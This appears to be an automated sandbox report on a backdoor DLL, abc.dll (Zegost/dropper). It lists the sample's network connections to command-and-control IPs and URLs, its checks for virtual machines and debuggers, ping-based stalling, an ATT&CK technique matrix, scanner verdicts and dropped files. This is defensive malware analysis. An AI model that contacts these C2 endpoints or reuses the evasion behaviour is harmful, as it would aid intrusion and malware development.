Source: Amcache.hve.15.drBinary or memory string: VMware, Inc.me
Source: Amcache.hve.15.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/5&280b647&0&000000
Source: Amcache.hve.15.drBinary or memory string: VMware-42 35 bb 32 33 75 d2 27-52 00 3c e2 4b d4 32 71
Source: Amcache.hve.15.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/5&1ec51bf7&0&000000
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_026E0E83 LoadLibraryA,GetProcAddress,4_2_026E0E83
Source: C:\Windows\SysWOW64\rundll32.exeProcess queried: DebugPortJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess queried: DebugPortJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess queried: DebugPortJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess queried: DebugPortJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_10005318 wsprintfA,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,12_2_10005318

HIPS / PFW / Operating System Protection Evasion

barindex
Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 107.163.56.232 19Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 107.163.56.231 98Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 107.163.56.110 98Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 107.163.56.251 6658Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 123.126.45.92 80Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeDomain query: blog.sina.com.cn
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\abc.dll",#1Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: Amcache.hve.15.drBinary or memory string: msmpeng.exe
Source: Amcache.hve.15.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_1000490F socket,socket,bind,ioctlsocket,4_2_1000490F
Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
Valid Accounts11
Native API
11
Registry Run Keys / Startup Folder
1
Access Token Manipulation
1
Deobfuscate/Decode Files or Information
OS Credential Dumping2
File and Directory Discovery
Remote Services1
Archive Collected Data
Exfiltration Over Other Network Medium1
Ingress Tool Transfer
Eavesdrop on Insecure Network CommunicationRemotely Track Device Without Authorization1
System Shutdown/Reboot
Default AccountsScheduled Task/Job1
Bootkit
111
Process Injection
3
Obfuscated Files or Information
LSASS Memory11
System Information Discovery
Remote Desktop ProtocolData from Removable MediaExfiltration Over Bluetooth1
Encrypted Channel
Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
Domain AccountsAt (Linux)Logon Script (Windows)11
Registry Run Keys / Startup Folder
3
Software Packing
Security Account Manager21
Security Software Discovery
SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration1
Non-Standard Port
Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)1
Masquerading
NTDS21
Virtualization/Sandbox Evasion
Distributed Component Object ModelInput CaptureScheduled Transfer1
Non-Application Layer Protocol
SIM Card SwapCarrier Billing Fraud
Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script21
Virtualization/Sandbox Evasion
LSA Secrets1
Process Discovery
SSHKeyloggingData Transfer Size Limits1
Application Layer Protocol
Manipulate Device CommunicationManipulate App Store Rankings or Ratings
Replication Through Removable MediaLaunchdRc.commonRc.common1
Access Token Manipulation
Cached Domain Credentials1
Application Window Discovery
VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
External Remote ServicesScheduled TaskStartup ItemsStartup Items111
Process Injection
DCSync11
Remote System Discovery
Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job1
Bootkit
Proc Filesystem1
System Network Configuration Discovery
Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)1
Rundll32
/etc/passwd and /etc/shadowSystem Network Connections DiscoverySoftware Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 574344 Sample: abc.dll Startdate: 17/02/2022 Architecture: WINDOWS Score: 100 68 Antivirus / Scanner detection for submitted sample 2->68 70 Multi AV Scanner detection for submitted file 2->70 72 Sigma detected: UNC2452 Process Creation Patterns 2->72 74 4 other signatures 2->74 9 loaddll32.exe 1 2->9         started        11 rundll32.exe 2->11         started        process3 process4 13 rundll32.exe 1 14 9->13         started        17 cmd.exe 1 9->17         started        19 rundll32.exe 9->19         started        23 4 other processes 9->23 21 cmd.exe 11->21         started        dnsIp5 62 107.163.56.110, 18530 TAKE2US United States 13->62 64 107.163.56.231, 18530 TAKE2US United States 13->64 66 4 other IPs or domains 13->66 80 System process connects to network (likely due to code injection or exploit) 13->80 82 Found evasive API chain (may stop execution after checking mutex) 13->82 84 Found stalling execution ending in API Sleep call 13->84 90 2 other signatures 13->90 86 Uses ping.exe to sleep 17->86 88 Uses ping.exe to check the status of other devices and networks 17->88 25 rundll32.exe 17->25         started        27 cmd.exe 19->27         started        30 rundll32.exe 19->30         started        32 conhost.exe 21->32         started        34 PING.EXE 21->34         started        36 WerFault.exe 23 9 23->36         started        38 WerFault.exe 9 23->38         started        signatures6 process7 signatures8 40 cmd.exe 1 25->40         started        78 Uses ping.exe to sleep 27->78 43 cmd.exe 27->43         started        45 conhost.exe 27->45         started        47 PING.EXE 1 27->47         started        process9 signatures10 76 Uses ping.exe to sleep 40->76 49 PING.EXE 1 40->49         started        52 conhost.exe 40->52         started        54 PING.EXE 43->54         started        56 conhost.exe 43->56         started        process11 dnsIp12 58 127.0.0.1 unknown unknown 49->58 60 192.168.2.1 unknown unknown 54->60

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
abc.dll79%VirustotalBrowse
abc.dll93%ReversingLabsWin32.Backdoor.Zegost
abc.dll100%AviraTR/Dropper.Gen
abc.dll100%Joe Sandbox ML
No Antivirus matches
SourceDetectionScannerLabelLinkDownload
18.0.rundll32.exe.10000000.0.unpack100%AviraTR/Dropper.GenDownload File
12.0.rundll32.exe.10000000.1.unpack100%AviraTR/Dropper.GenDownload File
4.2.rundll32.exe.10000000.0.unpack100%AviraTR/Dropper.GenDownload File
18.0.rundll32.exe.10000000.1.unpack100%AviraTR/Dropper.GenDownload File
12.2.rundll32.exe.10000000.0.unpack100%AviraTR/Dropper.GenDownload File
12.0.rundll32.exe.10000000.0.unpack100%AviraTR/Dropper.GenDownload File
18.2.rundll32.exe.10000000.0.unpack100%AviraTR/Dropper.GenDownload File
SourceDetectionScannerLabelLink
blogx.sina.com.cn0%VirustotalBrowse
SourceDetectionScannerLabelLink
http://107.163.56.232:18963/main.php?0%Avira URL Cloudsafe
http://blog.sina.com.cn/u/5762479093.0%Avira URL Cloudsafe
http://107.163.56.232:18963/main.php~0%Avira URL Cloudsafe
http://blog.sina.com.c-k0%Avira URL Cloudsafe
http://107.163.56.232:18963/main.phpz0%Avira URL Cloudsafe
http://blog.sina.com.cn/u/5762479093i0%Avira URL Cloudsafe
http://blog.sina.com.cn/u/5762479093lication0%Avira URL Cloudsafe
http://blog.sina.com.cn/u/576247909320%Avira URL Cloudsafe
http://107.163.56.232:18963/main.php~-0%Avira URL Cloudsafe
http://107.163.56.232:18963/main.phpileMaps0%Avira URL Cloudsafe
http://107.163.56.232:18963/main.phpr0%Avira URL Cloudsafe
http://107.163.56.110:18530/u1129.html0%Avira URL Cloudsafe
http://107.163.56.232:18963/main.phpP0%Avira URL Cloudsafe
http://107.163.56.232:0%Avira URL Cloudsafe
http://blog.sina.com.cn/u/%s0%Avira URL Cloudsafe
http://blog.sina.com.cn/u/57624790930%Avira URL Cloudsafe
http://blog.sina.com.cn/u/5762479093$n0%Avira URL Cloudsafe
http://107.163.56.232:18963/main.phpJ0%Avira URL Cloudsafe
http://107.160%Avira URL Cloudsafe
http://107.163.56.231:18530/0%Avira URL Cloudsafe
http://107.163.56.232:18963/main.php.sina.com.cn0%Avira URL Cloudsafe
http://107.163.56.232:18963/main.phpiceActivation0%Avira URL Cloudsafe
http://blog.sina.com.c18963/main.php0%Avira URL Cloudsafe
http://107.163.56.232:18963/main.phplication0%Avira URL Cloudsafe
http://107.163.56.232:18963/main.phpC:0%Avira URL Cloudsafe
http://107.163.56.232:18963/main.phpata0%Avira URL Cloudsafe
http://blog.sina.com.c0%Avira URL Cloudsafe
http://107.163.56.231:18530/joy.asp?sid=rungnejcntCWrem5Fevte0%Avira URL Cloudsafe
http://107.163.56.232:18963/main.php0%Avira URL Cloudsafe
http://107.163.56.231:18530//joy.asp?sid=rungnejcntCWrem5Fe5vteX8v2LUicbtudb8mtiWnZeYmZK0%Avira URL Cloudsafe
http://blog.sina.com.cn/u/5762479093P0%Avira URL Cloudsafe
http://107.163.56.232:n/u/57624790930%Avira URL Cloudsafe
http://107.163.56.232:18963/main.php-0%Avira URL Cloudsafe
http://107.163.56.232:18963/main.php.0%Avira URL Cloudsafe
http://107.163.56.232:18963/main.phpn0%Avira URL Cloudsafe
http://107.163.56.232:18963/main.phph0%Avira URL Cloudsafe
http://107.163.56.232:18963/main.phpf0%Avira URL Cloudsafe
http://107.163.56.232:18963/main.phption0%Avira URL Cloudsafe
NameIPActiveMaliciousAntivirus DetectionReputation
blogx.sina.com.cn
123.126.45.92
truetrueunknown
blog.sina.com.cn
unknown
unknowntrue
    unknown
    NameSourceMaliciousAntivirus DetectionReputation
    http://107.163.56.232:18963/main.php?rundll32.exe, 00000004.00000002.773183243.00000000028CD000.00000004.00000020.00020000.00000000.sdmpfalse
    • Avira URL Cloud: safe
    unknown
    http://blog.sina.com.cn/u/5762479093.rundll32.exe, 00000004.00000003.506492587.000000000296B000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.769142464.000000000296B000.00000004.00000020.00020000.00000000.sdmpfalse
    • Avira URL Cloud: safe
    unknown
    http://107.163.56.232:18963/main.php~rundll32.exe, 00000004.00000003.463071693.000000000296B000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.463965680.000000000296B000.00000004.00000020.00020000.00000000.sdmpfalse
    • Avira URL Cloud: safe
    unknown
    http://blog.sina.com.c-krundll32.exe, 00000004.00000003.621355433.0000000002933000.00000004.00000020.00020000.00000000.sdmpfalse
    • Avira URL Cloud: safe
    unknown
    http://107.163.56.232:18963/main.phpzrundll32.exe, 00000004.00000003.769259388.00000000028FA000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.497981630.00000000028FA000.00000004.00000020.00020000.00000000.sdmpfalse
    • Avira URL Cloud: safe
    unknown
    http://blog.sina.com.cn/u/5762479093irundll32.exe, 00000004.00000003.401571882.00000000028FA000.00000004.00000020.00020000.00000000.sdmpfalse
    • Avira URL Cloud: safe
    unknown
    http://blog.sina.com.cn/u/5762479093licationrundll32.exe, 00000004.00000003.700389541.00000000028FB000.00000004.00000020.00020000.00000000.sdmpfalse
    • Avira URL Cloud: safe
    unknown
    http://blog.sina.com.cn/u/57624790932rundll32.exe, 00000004.00000002.773183243.00000000028CD000.00000004.00000020.00020000.00000000.sdmpfalse
    • Avira URL Cloud: safe
    unknown
    http://107.163.56.232:18963/main.php~-rundll32.exe, 00000004.00000003.700389541.00000000028FB000.00000004.00000020.00020000.00000000.sdmpfalse
    • Avira URL Cloud: safe
    unknown
    http://107.163.56.232:18963/main.phpileMapsrundll32.exe, 00000004.00000003.506438395.0000000002933000.00000004.00000020.00020000.00000000.sdmpfalse
    • Avira URL Cloud: safe
    unknown
    http://107.163.56.232:18963/main.phprrundll32.exe, 00000004.00000003.401571882.00000000028FA000.00000004.00000020.00020000.00000000.sdmpfalse
    • Avira URL Cloud: safe
    unknown
    http://107.163.56.110:18530/u1129.htmlrundll32.exe, 00000004.00000002.773183243.00000000028CD000.00000004.00000020.00020000.00000000.sdmpfalse
    • Avira URL Cloud: safe
    unknown
    http://107.163.56.232:18963/main.phpPrundll32.exe, 00000004.00000003.523865021.000000000296B000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.515136005.000000000296B000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.523761741.000000000296B000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.621676038.000000000296B000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.621544263.000000000296B000.00000004.00000020.00020000.00000000.sdmpfalse
    • Avira URL Cloud: safe
    unknown
    http://upx.sf.netAmcache.hve.15.drfalse
      high
      http://107.163.56.232:rundll32.exe, 00000004.00000003.550575319.0000000002942000.00000004.00000020.00020000.00000000.sdmpfalse
      • Avira URL Cloud: safe
      unknown
      http://blog.sina.com.cn/u/%srundll32.exe, 00000004.00000002.777086863.0000000006E7C000.00000004.00000800.00020000.00000000.sdmpfalse
      • Avira URL Cloud: safe
      unknown
      http://blog.sina.com.cn/u/5762479093rundll32.exe, 00000004.00000003.551151432.000000000296B000.00000004.00000020.00020000.00000000.sdmpfalse
      • Avira URL Cloud: safe
      unknown
      http://blog.sina.com.cn/u/5762479093$nrundll32.exe, 00000004.00000003.321114729.0000000002932000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.321172786.0000000002938000.00000004.00000020.00020000.00000000.sdmpfalse
      • Avira URL Cloud: safe
      unknown
      http://107.163.56.232:18963/main.phpJrundll32.exe, 00000004.00000002.773183243.00000000028CD000.00000004.00000020.00020000.00000000.sdmpfalse
      • Avira URL Cloud: safe
      unknown
      http://107.16rundll32.exe, 00000004.00000002.774825715.000000000531E000.00000004.00000010.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.774894959.000000000539E000.00000004.00000010.00020000.00000000.sdmpfalse
      • Avira URL Cloud: safe
      low
      http://107.163.56.231:18530/rundll32.exe, rundll32.exe, 00000012.00000000.274634042.0000000010012000.00000040.00000001.01000000.00000003.sdmpfalse
      • Avira URL Cloud: safe
      unknown
      http://107.163.56.232:18963/main.php.sina.com.cnrundll32.exe, 00000004.00000003.573233556.0000000002937000.00000004.00000020.00020000.00000000.sdmpfalse
      • Avira URL Cloud: safe
      unknown
      http://107.163.56.232:18963/main.phpiceActivationrundll32.exe, 00000004.00000003.463071693.000000000296B000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.463965680.000000000296B000.00000004.00000020.00020000.00000000.sdmpfalse
      • Avira URL Cloud: safe
      unknown
      http://blog.sina.com.c18963/main.phprundll32.exe, 00000004.00000003.648250545.0000000002946000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.523736997.0000000002944000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.515119198.0000000002944000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.648222459.0000000002936000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.506457934.0000000002945000.00000004.00000020.00020000.00000000.sdmpfalse
      • Avira URL Cloud: safe
      unknown
      http://107.163.56.232:18963/main.phplicationrundll32.exe, 00000004.00000003.769259388.00000000028FA000.00000004.00000020.00020000.00000000.sdmpfalse
      • Avira URL Cloud: safe
      unknown
      http://107.163.56.232:18963/main.phpC:rundll32.exe, 00000004.00000002.775076173.00000000055BA000.00000004.00000010.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.774894959.000000000539E000.00000004.00000010.00020000.00000000.sdmpfalse
      • Avira URL Cloud: safe
      unknown
      http://107.163.56.232:18963/main.phpatarundll32.exe, 00000004.00000003.700389541.00000000028FB000.00000004.00000020.00020000.00000000.sdmpfalse
      • Avira URL Cloud: safe
      unknown
      http://blog.sina.com.crundll32.exe, 00000004.00000003.700288987.0000000002936000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.550621832.0000000002949000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.700120244.0000000002933000.00000004.00000020.00020000.00000000.sdmpfalse
      • Avira URL Cloud: safe
      unknown
      http://blog.sina.com.cn/u/5762479093Irundll32.exe, 00000004.00000002.773183243.00000000028CD000.00000004.00000020.00020000.00000000.sdmpfalse
        unknown
        http://107.163.56.231:18530/joy.asp?sid=rungnejcntCWrem5Fevterundll32.exe, 00000004.00000002.772649123.00000000002DB000.00000004.00000010.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        unknown
        http://107.163.56.232:18963/main.phprundll32.exe, rundll32.exe, 00000012.00000000.274634042.0000000010012000.00000040.00000001.01000000.00000003.sdmpfalse
        • Avira URL Cloud: safe
        unknown
        http://107.163.56.231:18530//joy.asp?sid=rungnejcntCWrem5Fe5vteX8v2LUicbtudb8mtiWnZeYmZKrundll32.exe, 00000004.00000002.773183243.00000000028CD000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        unknown
        http://blog.sina.com.cn/u/5762479093Prundll32.exe, 00000004.00000003.498090383.000000000296B000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.700183285.000000000296B000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.700339140.000000000296B000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.506492587.000000000296B000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        unknown
        http://107.163.56.232:n/u/5762479093rundll32.exe, 00000004.00000003.573233556.0000000002937000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        low
        http://107.163.56.232:18963/main.phpprundll32.exe, 00000004.00000003.401571882.00000000028FA000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.410069528.00000000028FA000.00000004.00000020.00020000.00000000.sdmpfalse
          unknown
          http://107.163.56.232:18963/main.php-rundll32.exe, 00000004.00000003.497981630.00000000028FA000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.463294098.00000000028FA000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          http://107.163.56.232:18963/main.php.rundll32.exe, 00000004.00000003.621544263.000000000296B000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          http://107.163.56.232:18963/main.phpnrundll32.exe, 00000004.00000002.773183243.00000000028CD000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          http://107.163.56.232:18963/main.phphrundll32.exe, 00000004.00000003.401571882.00000000028FA000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.410069528.00000000028FA000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          http://107.163.56.232:18963/main.phpfrundll32.exe, 00000004.00000002.773183243.00000000028CD000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          http://107.163.56.232:18963/main.phptionrundll32.exe, 00000004.00000003.700389541.00000000028FB000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          • No. of IPs < 25%
          • 25% < No. of IPs < 50%
          • 50% < No. of IPs < 75%
          • 75% < No. of IPs
          IPDomainCountryFlagASNASN NameMalicious
          123.126.45.92
          blogx.sina.com.cnChina
          4808CHINA169-BJChinaUnicomBeijingProvinceNetworkCNtrue
          107.163.56.232
          unknownUnited States
          20248TAKE2UStrue
          107.163.56.231
          unknownUnited States
          20248TAKE2UStrue
          107.163.56.110
          unknownUnited States
          20248TAKE2UStrue
          107.163.56.251
          unknownUnited States
          20248TAKE2UStrue
          IP
          192.168.2.1
          127.0.0.1
          Joe Sandbox Version:34.0.0 Boulder Opal
          Analysis ID:574344
          Start date:17.02.2022
          Start time:20:21:25
          Joe Sandbox Product:CloudBasic
          Overall analysis duration:0h 14m 28s
          Hypervisor based Inspection enabled:false
          Report type:full
          Sample file name:abc.dll
          Cookbook file name:default.jbs
          Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
          Number of analysed new started processes analysed:50
          Number of new started drivers analysed:0
          Number of existing processes analysed:0
          Number of existing drivers analysed:0
          Number of injected processes analysed:0
          Technologies:
          • HCA enabled
          • EGA enabled
          • HDC enabled
          • AMSI enabled
          Analysis Mode:default
          Analysis stop reason:Timeout
          Detection:MAL
          Classification:mal100.troj.evad.winDLL@41/11@54/7
          EGA Information:
          • Successful, ratio: 55.6%
          HDC Information:
          • Successful, ratio: 3.8% (good quality ratio 2.6%)
          • Quality average: 44.2%
          • Quality standard deviation: 36.9%
          HCA Information:
          • Successful, ratio: 99%
          • Number of executed functions: 59
          • Number of non-executed functions: 56
          Cookbook Comments:
          • Adjust boot time
          • Enable AMSI
          • Found application associated with file extension: .dll
          • Override analysis time to 240s for rundll32
          • Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, WerFault.exe, HxTsr.exe, RuntimeBroker.exe, WMIADAP.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe
          • Excluded IPs from analysis (whitelisted): 20.42.73.29, 52.182.143.212
          • Excluded domains from analysis (whitelisted): ris.api.iris.microsoft.com, client.wns.windows.com, fs.microsoft.com, onedsblobprdcus15.centralus.cloudapp.azure.com, blobcollector.events.data.trafficmanager.net, onedsblobprdeus15.eastus.cloudapp.azure.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, watson.telemetry.microsoft.com, arc.msn.com
          • Execution Graph export aborted for target loaddll32.exe, PID 2436 because there are no executed function
          • Execution Graph export aborted for target rundll32.exe, PID 4396 because there are no executed function
          • Execution Graph export aborted for target rundll32.exe, PID 456 because there are no executed function
          • Execution Graph export aborted for target rundll32.exe, PID 984 because there are no executed function
          • Not all processes where analyzed, report is missing behavior information
          • Report size exceeded maximum capacity and may have missing behavior information.
          • Report size getting too big, too many NtDeviceIoControlFile calls found.
          • Report size getting too big, too many NtOpenFile calls found.
          • Report size getting too big, too many NtOpenKeyEx calls found.
          • Report size getting too big, too many NtProtectVirtualMemory calls found.
          • Report size getting too big, too many NtQueryValueKey calls found.
          TimeTypeDescription
          20:22:27API Interceptor3839x Sleep call for process: rundll32.exe modified
          20:22:35API Interceptor1x Sleep call for process: loaddll32.exe modified
          20:22:39API Interceptor2x Sleep call for process: WerFault.exe modified
          No context
          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
          blogx.sina.com.cndgrep.exeGet hashmaliciousBrowse
          • 218.30.115.123
          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
          CHINA169-BJChinaUnicomBeijingProvinceNetworkCN6ygjHXjP4o.dllGet hashmaliciousBrowse
          • 124.200.57.100
          ys78aqF2aoGet hashmaliciousBrowse
          • 222.129.168.6
          qN4tOGAgvWGet hashmaliciousBrowse
          • 124.65.112.44
          dG6x7IXDwUGet hashmaliciousBrowse
          • 115.33.63.16
          x86_64Get hashmaliciousBrowse
          • 210.13.17.26
          mipselGet hashmaliciousBrowse
          • 123.121.253.77
          mipsGet hashmaliciousBrowse
          • 180.187.203.69
          8QzWoGKa5qGet hashmaliciousBrowse
          • 101.41.176.44
          AfubZdb790Get hashmaliciousBrowse
          • 124.200.55.38
          arm7Get hashmaliciousBrowse
          • 113.44.22.59
          x86Get hashmaliciousBrowse
          • 111.196.123.214
          armGet hashmaliciousBrowse
          • 124.65.112.35
          garm7Get hashmaliciousBrowse
          • 123.118.79.57
          garmGet hashmaliciousBrowse
          • 124.192.102.255
          7iTziJXqwCGet hashmaliciousBrowse
          • 60.207.195.47
          jd0XQtNAThGet hashmaliciousBrowse
          • 103.29.16.133
          tb7HftRvfAGet hashmaliciousBrowse
          • 210.74.78.120
          xd.arm7Get hashmaliciousBrowse
          • 124.205.146.101
          xd.armGet hashmaliciousBrowse
          • 114.115.176.246
          G3xc54hilGGet hashmaliciousBrowse
          • 121.71.208.180
          TAKE2USwTd0V97sFsGet hashmaliciousBrowse
          • 23.231.236.173
          DHL SHIPMENT PARCEL.exeGet hashmaliciousBrowse
          • 107.163.176.66
          muma.exeGet hashmaliciousBrowse
          • 107.163.176.11
          5egerdHX2aGet hashmaliciousBrowse
          • 198.144.245.114
          4ozT5pZbJIGet hashmaliciousBrowse
          • 74.82.188.239
          Shipping invoice2320214010.exeGet hashmaliciousBrowse
          • 107.163.176.251
          Scan_doc.exeGet hashmaliciousBrowse
          • 107.163.176.231
          b3astmode.arm7Get hashmaliciousBrowse
          • 74.82.188.210
          YisraengBPGet hashmaliciousBrowse
          • 23.231.236.173
          triage_dropped_file.exeGet hashmaliciousBrowse
          • 107.163.176.60
          2Mxp7Z86k3Get hashmaliciousBrowse
          • 107.163.175.179
          ZqCBTuED3bGet hashmaliciousBrowse
          • 23.231.236.181
          qElEhirDBKGet hashmaliciousBrowse
          • 107.163.7.182
          4DrtSJOLjrGet hashmaliciousBrowse
          • 107.163.7.172
          Xa5YQK4r69Get hashmaliciousBrowse
          • 107.163.7.128
          tgSQwVSEzE.exeGet hashmaliciousBrowse
          • 107.163.179.182
          hoho.x86Get hashmaliciousBrowse
          • 23.231.236.176
          3sO4kwopMH.exeGet hashmaliciousBrowse
          • 107.163.179.182
          DEUXRWq2W8.exeGet hashmaliciousBrowse
          • 107.163.179.182
          09090.xlsxGet hashmaliciousBrowse
          • 107.163.179.182
          No context
          No context
          Process:C:\Windows\SysWOW64\rundll32.exe
          File Type:ISO-8859 text, with CRLF line terminators
          Category:dropped
          Size (bytes):754
          Entropy (8bit):4.252109736945994
          Encrypted:false
          SSDEEP:12:8ItUY984YPtytxtj07txxtSgcgtEMSUOqtZMDMM2yohbg3KBgd8BIZM:84bY1JCVGQbM
          MD5:5AD7C9F27B4B162A23164065E58692BA
          SHA1:C653149F35223C56EEBA33CDD8DC07AA16984A3D
          SHA-256:EF5DD593C416102CE83074DD1C3DBB0AC420082FC0CB07B0F41D80ECDF2FD052
          SHA-512:6EBB629A74A1700D2FC507A28B82FABFB0FBBB34E74EC0F025552B578F43928DF523D22DB073DBF364BF2A2B89A61898D1708B50320FF6AA290D8EB9AB17B800
          Malicious:false
          Preview:..2022-02-19 21:56..iOffset....2022-02-21 17:06..iOffset....2022-02-23 09:07..iOffset....2022-02-25 05:03..iOffset....2022-02-26 21:54..iOffset....2022-02-28 16:40..iOffset....2022-03-02 12:59..iOffset....2022-03-04 05:12..iOffset....2022-03-06 00:58..iOffset....2022-03-07 15:59..iOffset....2022-03-09 10:45..iOffset....2022-03-11 02:31..iOffset....2022-03-12 21:42..iOffset....2022-03-14 14:06..iOffset....2022-03-16 05:39..iOffset....2022-03-17 18:00..iOffset....2022-03-19 13:21..iOffset....2022-03-21 05:00..iOffset....2022-03-23 00:18..iOffset....2022-03-24 19:39..iOffset....2022-03-26 16:00..iOffset....2022-03-28 07:51..iOffset....2022-03-30 02:36..iOffset....2022-03-31 21:53..iOffset....2022-04-02 18:13..iOffset....2022-04-04 08:49..iOffset..
          Process:C:\Windows\SysWOW64\WerFault.exe
          File Type:Little-endian UTF-16 Unicode text, with CRLF line terminators
          Category:dropped
          Size (bytes):65536
          Entropy (8bit):1.0167244018561883
          Encrypted:false
          SSDEEP:192:z0/JiW0oXAHBUZMX4jed+57nzP/u7sFS274ItWc:o/JiQXoBUZMX4jec3P/u7sFX4ItWc
          MD5:E546AB0EA0EA7180CF04C24EA7016722
          SHA1:59B25B97DF6A89A6766F38C055CD3F9576DF4C81
          SHA-256:6AFC88D828974A82DF56824FC9E74AEF13E89E30FAC0AA19364A91E0DF15A842
